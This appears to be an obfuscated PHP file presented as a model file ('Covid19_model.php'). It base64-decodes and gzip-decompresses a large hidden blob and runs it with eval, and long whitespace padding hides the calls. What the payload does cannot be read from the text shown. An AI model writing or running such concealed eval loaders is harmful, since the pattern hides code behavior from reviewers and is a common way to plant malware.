<?php 
        $__='printf';$_='Loading donjo-app/models/Covid19_model.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
